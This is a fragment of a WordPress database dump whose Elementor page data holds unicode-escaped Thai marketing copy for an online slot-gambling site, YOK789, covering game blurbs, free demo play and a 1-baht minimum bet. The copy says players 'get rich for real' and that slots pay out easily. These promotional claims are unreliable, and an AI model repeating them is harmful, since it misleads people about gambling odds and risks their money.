\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2772,380,'_thumbnail_id','371'),(2773,380,'_elementor_edit_mode','builder'),(2774,380,'_elementor_template_type','wp-page'),(2775,380,'_elementor_version','3.35.5'),(2776,380,'_elementor_pro_version','3.32.3'),(2777,380,'_wp_page_template','default'),(2778,380,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2779,380,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 